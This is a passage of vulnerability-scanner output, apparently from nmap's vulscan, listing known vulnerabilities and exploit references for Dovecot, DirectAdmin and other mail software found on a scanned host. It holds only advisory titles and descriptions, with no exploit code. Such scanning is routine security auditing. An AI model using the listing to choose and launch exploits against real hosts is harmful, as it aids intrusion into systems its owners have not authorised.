11274| [CVE-2007-1926] Cross-site scripting (XSS) vulnerability in JBMC Software DirectAdmin before 1.293 does not properly display log files, which allows remote authenticated users to inject arbitrary web script or HTML via (1) http or (2) ftp requests logged in /var/log/directadmin/security.log
11275| [CVE-2007-1508] Cross-site scripting (XSS) vulnerability in CMD_USER_STATS in DirectAdmin allows remote attackers to inject arbitrary web script or HTML via the RESULT parameter, a different vector than CVE-2006-5983.
11276| [CVE-2007-0618] Unspecified vulnerability in (1) pop3d, (2) pop3ds, (3) imapd, and (4) imapds in IBM AIX 5.3.0 has unspecified impact and attack vectors, involving an "authentication vulnerability."
11277| [CVE-2006-5983] Multiple cross-site scripting (XSS) vulnerabilities in JBMC Software DirectAdmin 1.28.1 allow remote authenticated users to inject arbitrary web script or HTML via the (1) user parameter to (a) CMD_SHOW_RESELLER or (b) CMD_SHOW_USER in the Admin level
11278| [CVE-2006-5973] Off-by-one buffer overflow in Dovecot 1.0test53 through 1.0.rc14, and possibly other versions, when index files are used and mmap_disable is set to "yes," allows remote authenticated IMAP or POP3 users to cause a denial of service (crash) via unspecified vectors involving the cache file.
11279| [CVE-2006-2502] Stack-based buffer overflow in pop3d in Cyrus IMAPD (cyrus-imapd) 2.3.2, when the popsubfolders option is enabled, allows remote attackers to execute arbitrary code via a long USER command.
11280| [CVE-2006-2414] Directory traversal vulnerability in Dovecot 1.0 beta and 1.0 allows remote attackers to list files and directories under the mbox parent directory and obtain mailbox names via ".." sequences in the (1) LIST or (2) DELETE IMAP command.
11281| [CVE-2006-2153] Cross-site scripting (XSS) vulnerability in HTM_PASSWD in DirectAdmin Hosting Management allows remote attackers to inject arbitrary web script or HTML via the domain parameter.
11282| [CVE-2006-0730] Multiple unspecified vulnerabilities in Dovecot before 1.0beta3 allow remote attackers to cause a denial of service (application crash or hang) via unspecified vectors involving (1) "potential hangs" in the APPEND command and "potential crashes" in (2) dovecot-auth and (3) imap/pop3-login. NOTE: vector 2 might be related to a double free vulnerability.
11283| [CVE-2002-0925] Format string vulnerability in mmsyslog function allows remote attackers to execute arbitrary code via (1) the USER command to mmpop3d for mmmail 0.0.13 and earlier, (2) the HELO command to mmsmtpd for mmmail 0.0.13 and earlier, or (3) the USER command to mmftpd 0.0.7 and earlier.
11284| [CVE-2001-0143] vpop3d program in linuxconf 1.23r and earlier allows local users to overwrite arbitrary files via a symlink attack.
11285| [CVE-2000-1197] POP2 or POP3 server (pop3d) in imap-uw IMAP package on FreeBSD and other operating systems creates lock files with predictable names, which allows local users to cause a denial of service (lack of mail access) for other users by creating lock files for other mail boxes.
11286| [CVE-1999-1445] Vulnerability in imapd and ipop3d in Slackware 3.4 and 3.3 with shadowing enabled, and possibly other operating systems, allows remote attackers to cause a core dump via a short sequence of USER and PASS commands that do not provide valid usernames or passwords.
11287|
11288| SecurityFocus - https://www.securityfocus.com/bid/:
11289| [103201] Dovecot CVE-2017-14461 Out-Of-Bounds Read Information Disclosure Vulnerability
11290| [97536] Dovecot CVE-2017-2669 Denial of Service Vulnerability
11291| [94639] Dovecot Auth Component CVE-2016-8652 Denial of Service Vulnerability
11292| [91175] Dovecot CVE-2016-4982 Local Information Disclosure Vulnerability
11293| [84736] Dovecot CVE-2008-4870 Local Security Vulnerability
11294| [83952] DirectAdmin CVE-2006-2153 Cross-Site Scripting Vulnerability
11295| [74335] Dovecot 'ssl-proxy-openssl.c' Remote Denial of Service Vulnerability
11296| [67306] Dovecot Denial of Service Vulnerability
11297| [67219] akpop3d 'pszQuery' Remote Memory Corruption Vulnerability
11298| [63911] Installatron Plugin for DirectAdmin Insecure Temporary File Creation Vulnerability
11299| [63373] Installatron Plugin for DirectAdmin cURL Output Remote Privilege Escalation Vulnerability
11300| [63367] Dovecot Checkpassword Authentication Protocol Local Authentication Bypass Vulnerability
11301| [62929] DirectAdmin Backup Multiple Security Vulnerabilities
11302| [61763] RETIRED: Dovecot 'LIST' Command Denial of Service Vulnerability
11303| [61017] DirectAdmin Symlink Attack Multiple Remote Privilege Escalation Vulnerabilities
11304| [60465] Exim for Dovecot 'use_shell' Remote Command Execution Vulnerability
11305| [60052] Dovecot 'APPEND' Parameter Denial of Service Vulnerability
11306| [56759] RETIRED: Dovecot 'mail-search.c' Denial of Service Vulnerability
11307| [53281] DirectAdmin Multiple Cross Site Scripting Vulnerabilities
11308| [52848] RETIRED: DirectAdmin 'CMD_DOMAIN' Cross-Site Scripting Vulnerability
11309| [52845] JBMC Software DirectAdmin 'domain' Parameter Cross Site Scripting Vulnerability
11310| [50709] Dovecot SSL Certificate 'Common Name' Field Validation Security Bypass Vulnerability
11311| [48003] Dovecot 'script-login' Multiple Security Bypass Vulnerabilities
11312| [47930] Dovecot Header Name NULL Character Denial of Service Vulnerability
11313| [47693] DirectAdmin 'mysql_backup' Folder Permissions Information Disclosure Vulnerability
11314| [47690] DirectAdmin Hard Link Local Privilege Escalation Vulnerability
11315| [44874] Apple Mac OS X Dovecot (CVE-2010-4011) Memory Corruption Vulnerability
11316| [43690] Dovecot Access Control List (ACL) Multiple Remote Vulnerabilities
11317| [41964] Dovecot Access Control List (ACL) Plugin Security Bypass Weakness
11318| [39838] tpop3d Remote Denial of Service Vulnerability
11319| [39258] Dovecot Service Control Access List Security Bypass Vulnerability
11320| [38721] DirectAdmin 'CMD_DB_VIEW' Cross-Site Scripting Vulnerability
11321| [37084] Dovecot Insecure 'base_dir' Permissions Local Privilege Escalation Vulnerability
11322| [36377] Dovecot Sieve Plugin Multiple Unspecified Buffer Overflow Vulnerabilities
11323| [35450] DirectAdmin 'CMD_REDIRECT' Cross-Site Scripting Vulnerability
11324| [34678] DirectAdmin '/CMD_DB' Restore Action Local Privilege Escalation Vulnerability
11325| [34676] DirectAdmin '/CMD_DB' Backup Action Insecure Temporary File Creation Vulnerability
11326| [32582] Dovecot ManageSieve Service '.sieve' Files Directory Traversal Vulnerability
11327| [31997] Dovecot Invalid Message Address Parsing Denial of Service Vulnerability
11328| [31587] Dovecot ACL Plugin Multiple Security Bypass Vulnerabilities
11329| [28181] Dovecot 'Tab' Character Password Check Security Bypass Vulnerability
11330| [28092] Dovecot 'mail_extra_groups' Insecure Settings Local Unauthorized Access Vulnerability
11331| [27093] Dovecot Authentication Cache Security Bypass Vulnerability
11332| [25607] DirectAdmin CMD_BANDWIDTH_BREAKDOWN Cross-Site Scripting Vulnerability
11333| [25182] Dovecot ACL Plugin Security Bypass Vulnerability
11334| [24688] DirectAdmin Domain Parameter Cross-Site Scripting Vulnerability
11335| [23552] Dovecot Zlib Plugin Remote Information Disclosure Vulnerability
11336| [23254] DirectAdmin Logfile HTML Injection Vulnerability
11337| [22996] DirectAdmin CMD_USER_STATS Cross-Site Scripting Vulnerability
11338| [22262] IBM AIX Pop3D/Pop3DS/IMapD/IMapDS Authentication Bypass Vulnerability
11339| [21183] Dovecot IMAP Server Mapped Pages Off-By-One Buffer Overflow Vulnerability
11340| [21049] DirectAdmin Multiple Cross-Site Scripting Vulnerabilities
11341| [18056] Cyrus IMAPD POP3D Remote Buffer Overflow Vulnerability
11342| [17961] Dovecot Remote Information Disclosure Vulnerability
11343| [16672] Dovecot Double Free Denial of Service Vulnerability
11344| [8495] akpop3d User Name SQL Injection Vulnerability
11345| [8473] Vpop3d Remote Denial Of Service Vulnerability
11346| [3990] ZPop3D Bad Login Logging Failure Vulnerability
11347| [2781] DynFX MailServer POP3d Denial of Service Vulnerability
11348|
11349| IBM X-Force - https://exchange.xforce.ibmcloud.com:
11350| [86382] Dovecot POP3 Service denial of service
11351| [85490] DirectAdmin Backup System email account functionality symlink
11352| [85488] DirectAdmin Backup System symlink
11353| [84396] Dovecot IMAP APPEND denial of service
11354| [80453] Dovecot mail-search.c denial of service
11355| [74569] DirectAdmin CMD_DOMAIN cross-site scripting
11356| [72685] DirectAdmin domain parameter cross-site request forgery
11357| [71354] Dovecot SSL Common Name (CN) weak security
11358| [67675] Dovecot script-login security bypass
11359| [67674] Dovecot script-login directory traversal
11360| [67589] Dovecot header name denial of service
11361| [67254] DirectAdmin MySQL information disclosure
11362| [67253] DirectAdmin hard link privilege escalation
11363| [63267] Apple Mac OS X Dovecot information disclosure
11364| [62340] Dovecot mailbox security bypass
11365| [62339] Dovecot IMAP or POP3 denial of service
11366| [62256] Dovecot mailbox security bypass
11367| [62255] Dovecot ACL entry security bypass
11368| [60639] Dovecot ACL plugin weak security
11369| [57267] Apple Mac OS X Dovecot Kerberos security bypass
11370| [56875] DirectAdmin name cross-site scripting
11371| [56763] Dovecot header denial of service
11372| [55181] DirectAdmin account cross-site request forgery
11373| [54363] Dovecot base_dir privilege escalation
11374| [53248] CMU Sieve plugin for Dovecot unspecified buffer overflow
11375| [51292] DirectAdmin CMD_REDIRECT cross-site scripting
11376| [50167] DirectAdmin CMD_DB command execution
11377| [49416] DirectAdmin CMD_DB backup action symlink
11378| [46323] Dovecot dovecot.conf information disclosure
11379| [46227] Dovecot message parsing denial of service
11380| [45669] Dovecot ACL mailbox security bypass
11381| [45667] Dovecot ACL plugin rights security bypass
11382| [41085] Dovecot TAB characters authentication bypass
11383| [41009] Dovecot mail_extra_groups option unauthorized access
11384| [39342] Dovecot LDAP auth cache configuration security bypass
11385| [36510] DirectAdmin user parameter cross-site scripting
11386| [35767] Dovecot ACL plugin security bypass
11387| [35177] DirectAdmin domain parameter cross-site scripting
11388| [34082] Dovecot mbox-storage.c directory traversal
11389| [33390] DirectAdmin log file cross-site scripting
11390| [33023] DirectAdmin CMD_USER_STATS form cross-site scripting
11391| [30433] Dovecot IMAP/POP3 server dovecot.index.cache buffer overflow
11392| [30256] DirectAdmin user, TYPE, and name parameters cross-site scripting
11393| [26578] Cyrus IMAP pop3d buffer overflow
11394| [26536] Dovecot IMAP LIST information disclosure
11395| [24710] Dovecot dovecot-auth and imap/pop3-login denial of service
11396| [24709] Dovecot APPEND command denial of service
11397| [13018] akpop3d authentication code SQL injection
11398| [7345] Slackware Linux imapd and ipop3d core dump
11399| [6269] imap, ipop2d and ipop3d buffer overflows
11400| [5923] Linuxconf vpop3d symbolic link
11401| [4918] IPOP3D, Buffer overflow attack
11402| [1560] IPOP3D, user login successful
11403| [1559] IPOP3D user login to remote host successful
11404| [1525] IPOP3D, user logout
11405| [1524] IPOP3D, user auto-logout
11406| [1523] IPOP3D, user login failure
11407| [1522] IPOP3D, brute force attack
11408| [1521] IPOP3D, user kiss of death logout
11409| [418] pop3d mktemp creates insecure temporary files
11410|
11411| Exploit-DB - https://www.exploit-db.com:
11412| [29747] DirectAdmin 1.292 CMD_USER_STATS Cross-Site Scripting Vulnerability
11413| [29006] DirectAdmin 1.28/1.29 CMD_FTP_SHOW DOMAIN Parameter XSS
11414| [29005] DirectAdmin 1.28/1.29 CMD_EMAIL_LIST name Parameter XSS
11415| [29004] DirectAdmin 1.28/1.29 CMD_EMAIL_VACATION_MODIFY user Parameter XSS
11416| [29003] DirectAdmin 1.28/1.29 CMD_TICKET type Parameter XSS
11417| [29002] DirectAdmin 1.28/1.29 CMD_EMAIL_FORWARDER_MODIFY user Parameter XSS
11418| [29001] DirectAdmin 1.28/1.29 CMD_TICKET_CREATE TYPE Parameter XSS
11419| [29000] DirectAdmin 1.28/1.29 CMD_SHOW_USER user Parameter XSS
11420| [28999] DirectAdmin 1.28/1.29 CMD_SHOW_RESELLER user Parameter XSS
11421| [25297] Dovecot with Exim sender_address Parameter - Remote Command Execution
11422| [23053] Vpop3d Remote Denial of Service Vulnerability
11423| [16836] Cyrus IMAPD pop3d popsubfolders USER Buffer Overflow
11424| [11893] tPop3d 1.5.3 DoS
11425| [11813] DirectAdmin 1.34.4 - Multi CSRF vulnerability
11426| [11029] DirectAdmin <= 1.33.6 Symlink Permission Bypass
11427| [10779] DirectAdmin 1.34.0 - CSRF Create Administrator Vulnerability
11428| [5257] Dovecot IMAP 1.0.10 <= 1.1rc2 - Remote Email Disclosure Exploit
11429| [2185] Cyrus IMAPD 2.3.2 (pop3d) Remote Buffer Overflow Exploit (3)
11430| [2053] Cyrus IMAPD 2.3.2 (pop3d) Remote Buffer Overflow Exploit (2)
11431| [1813] Cyrus IMAPD 2.3.2 (pop3d) Remote Buffer Overflow Exploit
11432|
11433| OpenVAS (Nessus) - http://www.openvas.org:
11434| [901026] Dovecot Sieve Plugin Multiple Buffer Overflow Vulnerabilities
11435| [901025] Dovecot Version Detection
11436| [881402] CentOS Update for dovecot CESA-2011:1187 centos5 x86_64
11437| [881358] CentOS Update for dovecot CESA-2011:1187 centos4 x86_64
11438| [880980] CentOS Update for dovecot CESA-2011:1187 centos5 i386
11439| [880967] CentOS Update for dovecot CESA-2011:1187 centos4 i386
11440| [870607] RedHat Update for dovecot RHSA-2011:0600-01
11441| [870471] RedHat Update for dovecot RHSA-2011:1187-01
11442| [870153] RedHat Update for dovecot RHSA-2008:0297-02
11443| [863272] Fedora Update for dovecot FEDORA-2011-7612
11444| [863115] Fedora Update for dovecot FEDORA-2011-7258
11445| [861525] Fedora Update for dovecot FEDORA-2007-664
11446| [861394] Fedora Update for dovecot FEDORA-2007-493
11447| [861333] Fedora Update for dovecot FEDORA-2007-1485
11448| [860845] Fedora Update for dovecot FEDORA-2008-9202
11449| [860663] Fedora Update for dovecot FEDORA-2008-2475
11450| [860169] Fedora Update for dovecot FEDORA-2008-2464
11451| [860089] Fedora Update for dovecot FEDORA-2008-9232
11452| [840950] Ubuntu Update for dovecot USN-1295-1
11453| [840668] Ubuntu Update for dovecot USN-1143-1
11454| [840583] Ubuntu Update for dovecot vulnerabilities USN-1059-1
11455| [840335] Ubuntu Update for dovecot vulnerabilities USN-593-1
11456| [840290] Ubuntu Update for dovecot vulnerability USN-567-1
11457| [840234] Ubuntu Update for dovecot vulnerability USN-666-1
11458| [840072] Ubuntu Update for dovecot vulnerability USN-487-1
11459| [831405] Mandriva Update for dovecot MDVSA-2011:101 (dovecot)
11460| [831230] Mandriva Update for dovecot MDVSA-2010:217 (dovecot)
11461| [831197] Mandriva Update for dovecot MDVSA-2010:196 (dovecot)
11462| [831054] Mandriva Update for dovecot MDVSA-2010:104 (dovecot)
11463| [830496] Mandriva Update for dovecot MDVSA-2008:232 (dovecot)
11464| [801055] Dovecot 'base_dir' Insecure Permissions Security Bypass Vulnerability
11465| [800030] Dovecot ACL Plugin Security Bypass Vulnerabilities
11466| [70767] Gentoo Security Advisory GLSA 201110-04 (Dovecot)
11467| [70259] FreeBSD Ports: dovecot
11468| [69959] Debian Security Advisory DSA 2252-1 (dovecot)
11469| [66522] FreeBSD Ports: dovecot
11470| [65010] Ubuntu USN-838-1 (dovecot)
11471| [64978] Debian Security Advisory DSA 1892-1 (dovecot)
11472| [64953] Mandrake Security Advisory MDVSA-2009:242-1 (dovecot)
11473| [64952] Mandrake Security Advisory MDVSA-2009:242 (dovecot)
11474| [64861] Fedora Core 10 FEDORA-2009-9559 (dovecot)
11475| [62965] Gentoo Security Advisory GLSA 200812-16 (dovecot)
11476| [62854] FreeBSD Ports: dovecot-managesieve
11477| [61916] FreeBSD Ports: dovecot
11478| [60588] Gentoo Security Advisory GLSA 200803-25 (dovecot)
11479| [60568] Debian Security Advisory DSA 1516-1 (dovecot)
11480| [60528] FreeBSD Ports: dovecot
11481| [60134] Debian Security Advisory DSA 1457-1 (dovecot)
11482| [60089] FreeBSD Ports: dovecot
11483| [58578] Debian Security Advisory DSA 1359-1 (dovecot)
11484| [56834] Debian Security Advisory DSA 1080-1 (dovecot)
11485|
11486| SecurityTracker - https://www.securitytracker.com:
11487| [1028744] DirectAdmin Backup System Flaws Let Local Users Gain Elevated Privileges
11488| [1028585] Dovecot APPEND Parameter Processing Flaw Lets Remote Authenticated Users Deny Service
11489| [1024740] Mac OS X Server Dovecot Memory Aliasing Bug May Cause Mail to Be Delivered to the Wrong User
11490| [1017288] Dovecot POP3/IMAP Cache File Buffer Overflow May Let Remote Users Execute Arbitrary Code
11491|
11492| OSVDB - http://www.osvdb.org:
11493| [96172] Dovecot POP3 Service Terminated LIST Command Remote DoS
11494| [94899] DirectAdmin Backup System Unspecified Email Account Function Symlink Local Privilege Escalation
11495| [94898] DirectAdmin Backup System Unspecified Symlink Arbitrary File Manipulation Local Privilege Escalation
11496| [93525] Dovecot IMAP APPEND Command Malformed Parameter Parsing Remote DoS
11497| [93004] Dovecot with Exim sender_address Parameter Remote Command Execution
11498| [88058] Dovecot lib-storage/mail-search.c Multiple Keyword Search Handling Remote DoS
11499| [80919] DirectAdmin CMD_DOMAIN Multiple Parameter XSS
11500| [77185] Dovecot SSL Certificate Common Name Field MitM Spoofing Weakness
11501| [74515] Dovecot script-login chroot Configuration Setting Traversal Arbitrary File Access
11502| [74514] Dovecot script-login User / Group Configuration Settings Remote Access Restriction Bypass
11503| [72495] Dovecot lib-mail/message-header-parser.c Mail Header Name NULL Character Handling Remote DoS
11504| [72120] DirectAdmin mysql_backups Folder MySQL Database Backup Local Disclosure
11505| [72119] DirectAdmin Backup Creation Hard Link Check Weakness Local Privilege Escalation
11506| [69260] Apple Mac OS X Server Dovecot Memory Aliasing Mail Delivery Issue
11507| [68516] Dovecot plugins/acl/acl-backend-vfile.c ACL Permission Addition User Private Namespace Mailbox Access Restriction Remote Bypass
11508| [68515] Dovecot plugins/acl/acl-backend-vfile.c ACL Permission Addition Specific Entry Order Mailbox Access Restriction Remote Bypass
11509| [68513] Dovecot Non-public Namespace Mailbox ACL Manipulation Access Restriction Remote Bypass
11510| [68512] Dovecot IMAP / POP3 Session Disconnect Master Process Outage Remote DoS
11511| [66625] Dovecot ACL Plugin INBOX ACL Copying Weakness Restriction Bypass
11512| [66113] Dovecot Mail Root Directory Creation Permission Weakness
11513| [66112] Dovecot Installation base_dir Parent Directory Permission Weakness
11514| [66111] Dovecot SEARCH Functionality str_find_init() Function Overflow
11515| [66110] Dovecot Multiple Unspecified Buffer Overflows
11516| [66108] Dovecot Malformed Message Body Processing Unspecified Functions Remote DoS
11517| [64783] Dovecot E-mail Message Header Unspecified DoS
11518| [63372] Apple Mac OS X Dovecot Kerberos Authentication SACL Restriction Bypass
11519| [62914] DirectAdmin CMD_DB_VIEW name Parameter XSS
11520| [62796] Dovecot mbox Format Email Header Handling DoS
11521| [61395] DirectAdmin Admin Account Creation CSRF
11522| [60316] Dovecot base_dir Directory Permission Weakness Local Privilege Escalation
11523| [58103] Dovecot CMU Sieve Plugin Script Handling Multiple Overflows
11524| [55296] DirectAdmin CMD_REDIRECT URL Parameter XSS
11525| [54015] DirectAdmin CMD_DB name Parameter Shell Metacharacter Arbitrary Command Execution
11526| [54014] DirectAdmin CMD_DB Database Backup Request Temporary File Symlink Arbitrary File Overwrite
11527| [50253] Dovecot dovecot.conf Permission Weakness Local ssl_key_password Parameter Disclosure
11528| [49918] Dovecot ManageSieve Script Name Handling Traversal Arbitrary File Manipulation
11529| [49429] Dovecot Message Parsing Feature Crafted Email Header Handling Remote DoS
11530| [49099] Dovecot ACL Plugin k Right Mailbox Creation Restriction Bypass
11531| [49098] Dovecot ACL Plugin Negative Access Rights Bypass
11532| [43137] Dovecot mail_extra_groups Symlink File Manipulation
11533| [42979] Dovecot passdbs Argument Injection Authentication Bypass
11534| [39876] Dovecot LDAP Auth Cache Security Bypass
11535| [39386] Dovecot ACL Plugin Insert Right APPEND / COPY Command Unauthorized Flag Manipulation
11536| [36999] DirectAdmin CMD_BANDWIDTH_BREAKDOWN user Parameter XSS
11537| [36339] DirectAdmin CMD_USER_STATS domain Parameter XSS
11538| [35489] Dovecot index/mbox/mbox-storage.c Traversal Arbitrary Gzip File Access
11539| [34687] DirectAdmin http/ftp XSS Log Viewer Data Injection
11540| [34273] DirectAdmin CMD_USER_STATS RESULT Parameter XSS
11541| [32676] DirectAdmin CMD_FTP_SHOW DOMAIN Parameter XSS
11542| [32675] DirectAdmin CMD_EMAIL_LIST name Parameter XSS
11543| [32674] DirectAdmin CMD_EMAIL_VACATION_MODIFY user Parameter XSS
11544| [32673] DirectAdmin CMD_TICKET type Parameter XSS
11545| [32672] DirectAdmin CMD_EMAIL_FORWARDER_MODIFY user Parameter XSS
11546| [32671] DirectAdmin CMD_TICKET_CREATE TYPE Parameter XSS
11547| [32670] DirectAdmin CMD_SHOW_USER user Parameter XSS
11548| [32669] DirectAdmin CMD_SHOW_RESELLER user Parameter XSS
11549| [30524] Dovecot IMAP/POP3 Server dovecot.index.cache Handling Overflow
11550| [25853] Cyrus IMAPD pop3d USER Command Remote Overflow
11551| [25727] Dovecot Multiple Command Traversal Arbitrary Directory Listing
11552| [25138] DirectAdmin HTM_PASSWD domain Parameter XSS
11553| [23281] Dovecot imap/pop3-login dovecot-auth DoS
11554| [23280] Dovecot Malformed APPEND Command DoS
11555| [14459] mmmail mmpop3d USER Command mmsyslog Function Format String
11556| [12033] Slackware Linux imapd/ipop3d Malformed USER/PASS Sequence DoS
11557| [5857] Linux pop3d Arbitrary Mail File Access
11558| [2471] akpop3d username SQL Injection
11559|_
11560143/tcp open imap Dovecot imapd
11561| vulscan: VulDB - https://vuldb.com:
11562| [139289] cPanel up to 68.0.14 dovecot-xaps-plugin Format privilege escalation
11563| [134480] Dovecot up to 2.3.5.2 Submission-Login Crash denial of service
11564| [134479] Dovecot up to 2.3.5.2 IMAP Server Crash denial of service
11565| [134024] Dovecot up to 2.3.5.1 JSON Encoder Username Crash denial of service
11566| [132543] Dovecot up to 2.2.36.0/2.3.4.0 Certificate Impersonation weak authentication
11567| [119762] Dovecot up to 2.2.28 dict Authentication var_expand() denial of service
11568| [114012] Dovecot up to 2.2.33 TLS SNI Restart denial of service
11569| [114009] Dovecot SMTP Delivery Email Message Out-of-Bounds memory corruption
11570| [112447] Dovecot up to 2.2.33/2.3.0 SASL Auth Memory Leak denial of service
11571| [106837] Dovecot up to 2.2.16 ssl-proxy-openssl.c ssl-proxy-opensslc denial of service
11572| [97052] Dovecot up to 2.2.26 auth-policy Unset Crash denial of service
11573| [69835] Dovecot 2.2.0/2.2.1 denial of service
11574| [13348] Dovecot up to 1.2.15/2.1.15 IMAP4/POP3 SSL/TLS Handshake denial of service
11575| [65684] Dovecot up to 2.2.6 unknown vulnerability
11576| [9807] Dovecot up to 1.2.7 on Exim Input Sanitizer privilege escalation
11577| [63692] Dovecot up to 2.0.15 spoofing
11578| [7062] Dovecot 2.1.10 mail-search.c denial of service
11579| [59792] Cyrus IMAPd 2.4.11 weak authentication
11580| [57517] Dovecot up to 2.0.12 Login directory traversal
11581| [57516] Dovecot up to 2.0.12 Access Restriction directory traversal
11582| [57515] Dovecot up to 2.0.12 Crash denial of service
11583| [54944] Dovecot up to 1.2.14 denial of service
11584| [54943] Dovecot up to 1.2.14 Access Restriction Symlink privilege escalation
11585| [54942] Dovecot up to 2.0.4 Access Restriction denial of service
11586| [54941] Dovecot up to 2.0.4 Access Restriction unknown vulnerability
11587| [54840] Dovecot up to 1.2.12 AGate unknown vulnerability
11588| [53277] Dovecot up to 1.2.10 denial of service
11589| [50082] Dovecot up to 1.1.6 Stack-based memory corruption
11590| [45256] Dovecot up to 1.1.5 directory traversal
11591| [44846] Dovecot 1.1.4/1.1.5 IMAP Client Crash denial of service
11592| [44546] Dovecot up to 1.0.x Access Restriction unknown vulnerability
11593| [44545] Dovecot up to 1.0.x Access Restriction unknown vulnerability
11594| [41430] Dovecot 1.0.12/1.1 Locking unknown vulnerability
11595| [40356] Dovecot 1.0.9 Cache unknown vulnerability
11596| [38222] Dovecot 1.0.2 directory traversal
11597| [37927] Ipswitch Ipswitch Collaboration Suite up to 2006.1 IMAP Service imapd32.exe memory corruption
11598| [36376] Dovecot up to 1.0.x directory traversal
11599| [35759] Atrium MERCUR IMAPD IMAP4 mcrimap4.exe memory corruption
11600| [33332] Timo Sirainen Dovecot up to 1.0test53 Off-By-One memory corruption
11601|
11602| MITRE CVE - https://cve.mitre.org:
11603| [CVE-2009-2632] Buffer overflow in the SIEVE script component (sieve/script.c), as used in cyrus-imapd in Cyrus IMAP Server 2.2.13 and 2.3.14, and Dovecot 1.0 before 1.0.4 and 1.1 before 1.1.7, allows local users to execute arbitrary code and read or modify arbitrary messages via a crafted SIEVE script, related to the incorrect use of the sizeof operator for determining buffer length, combined with an integer signedness error.
11604| [CVE-2011-4318] Dovecot 2.0.x before 2.0.16, when ssl or starttls is enabled and hostname is used to define the proxy destination, does not verify that the server hostname matches a domain name in the subject's Common Name (CN) of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via a valid certificate for a different hostname.
11605| [CVE-2011-3481] The index_get_ids function in index.c in imapd in Cyrus IMAP Server before 2.4.11, when server-side threading is enabled, allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via a crafted References header in an e-mail message.
11606| [CVE-2011-3372] imap/nntpd.c in the NNTP server (nntpd) for Cyrus IMAPd 2.4.x before 2.4.12 allows remote attackers to bypass authentication by sending an AUTHINFO USER command without sending an additional AUTHINFO PASS command.
11607| [CVE-2011-2167] script-login in Dovecot 2.0.x before 2.0.13 does not follow the chroot configuration setting, which might allow remote authenticated users to conduct directory traversal attacks by leveraging a script.
11608| [CVE-2011-2166] script-login in Dovecot 2.0.x before 2.0.13 does not follow the user and group configuration settings, which might allow remote authenticated users to bypass intended access restrictions by leveraging a script.
11609| [CVE-2011-1929] lib-mail/message-header-parser.c in Dovecot 1.2.x before 1.2.17 and 2.0.x before 2.0.13 does not properly handle '\0' characters in header names, which allows remote attackers to cause a denial of service (daemon crash or mailbox corruption) via a crafted e-mail message.
11610| [CVE-2010-4011] Dovecot in Apple Mac OS X 10.6.5 10H574 does not properly manage memory for user names, which allows remote authenticated users to read the private e-mail of other persons in opportunistic circumstances via standard e-mail clients accessing a user's own mailbox, related to a "memory aliasing issue."
11611| [CVE-2010-3780] Dovecot 1.2.x before 1.2.15 allows remote authenticated users to cause a denial of service (master process outage) by simultaneously disconnecting many (1) IMAP or (2) POP3 sessions.
11612| [CVE-2010-3779] Dovecot 1.2.x before 1.2.15 and 2.0.x before 2.0.beta2 grants the admin permission to the owner of each mailbox in a non-public namespace, which might allow remote authenticated users to bypass intended access restrictions by changing the ACL of a mailbox, as demonstrated by a symlinked shared mailbox.
11613| [CVE-2010-3707] plugins/acl/acl-backend-vfile.c in Dovecot 1.2.x before 1.2.15 and 2.0.x before 2.0.5 interprets an ACL entry as a directive to add to the permissions granted by another ACL entry, instead of a directive to replace the permissions granted by another ACL entry, in certain circumstances involving more specific entries that occur after less specific entries, which allows remote authenticated users to bypass intended access restrictions via a request to read or modify a mailbox.
11614| [CVE-2010-3706] plugins/acl/acl-backend-vfile.c in Dovecot 1.2.x before 1.2.15 and 2.0.x before 2.0.5 interprets an ACL entry as a directive to add to the permissions granted by another ACL entry, instead of a directive to replace the permissions granted by another ACL entry, in certain circumstances involving the private namespace of a user, which allows remote authenticated users to bypass intended access restrictions via a request to read or modify a mailbox.
11615| [CVE-2010-3304] The ACL plugin in Dovecot 1.2.x before 1.2.13 propagates INBOX ACLs to newly created mailboxes in certain configurations, which might allow remote attackers to read mailboxes that have unintended weak ACLs.
11616| [CVE-2010-0745] Unspecified vulnerability in Dovecot 1.2.x before 1.2.11 allows remote attackers to cause a denial of service (CPU consumption) via long headers in an e-mail message.
11617| [CVE-2010-0535] Dovecot in Apple Mac OS X 10.6 before 10.6.3, when Kerberos is enabled, does not properly enforce the service access control list (SACL) for sending and receiving e-mail, which allows remote authenticated users to bypass intended access restrictions via unspecified vectors.
11618| [CVE-2010-0433] The kssl_keytab_is_available function in ssl/kssl.c in OpenSSL before 0.9.8n, when Kerberos is enabled but Kerberos configuration files cannot be opened, does not check a certain return value, which allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via SSL cipher negotiation, as demonstrated by a chroot installation of Dovecot or stunnel without Kerberos configuration files inside the chroot.
11619| [CVE-2009-3897] Dovecot 1.2.x before 1.2.8 sets 0777 permissions during creation of certain directories at installation time, which allows local users to access arbitrary user accounts by replacing the auth socket, related to the parent directories of the base_dir directory, and possibly the base_dir directory itself.
11620| [CVE-2009-3235] Multiple stack-based buffer overflows in the Sieve plugin in Dovecot 1.0 before 1.0.4 and 1.1 before 1.1.7, as derived from Cyrus libsieve, allow context-dependent attackers to cause a denial of service (crash) and possibly execute arbitrary code via a crafted SIEVE script, as demonstrated by forwarding an e-mail message to a large number of recipients, a different vulnerability than CVE-2009-2632.
11621| [CVE-2008-5301] Directory traversal vulnerability in the ManageSieve implementation in Dovecot 1.0.15, 1.1, and 1.2 allows remote attackers to read and modify arbitrary .sieve files via a ".." (dot dot) in a script name.
11622| [CVE-2008-4907] The message parsing feature in Dovecot 1.1.4 and 1.1.5, when using the FETCH ENVELOPE command in the IMAP client, allows remote attackers to cause a denial of service (persistent crash) via an email with a malformed From address, which triggers an assertion error, aka "invalid message address parsing bug."
11623| [CVE-2008-4870] dovecot 1.0.7 in Red Hat Enterprise Linux (RHEL) 5, and possibly Fedora, uses world-readable permissions for dovecot.conf, which allows local users to obtain the ssl_key_password parameter value.
11624| [CVE-2008-4578] The ACL plugin in Dovecot before 1.1.4 allows attackers to bypass intended access restrictions by using the "k" right to create unauthorized "parent/child/child" mailboxes.
11625| [CVE-2008-4577] The ACL plugin in Dovecot before 1.1.4 treats negative access rights as if they are positive access rights, which allows attackers to bypass intended access restrictions.
11626| [CVE-2008-1218] Argument injection vulnerability in Dovecot 1.0.x before 1.0.13, and 1.1.x before 1.1.rc3, when using blocking passdbs, allows remote attackers to bypass the password check via a password containing TAB characters, which are treated as argument delimiters that enable the skip_password_check field to be specified.
11627| [CVE-2008-1199] Dovecot before 1.0.11, when configured to use mail_extra_groups to allow Dovecot to create dotlocks in /var/mail, might allow local users to read sensitive mail files for other users, or modify files or directories that are writable by group, via a symlink attack.
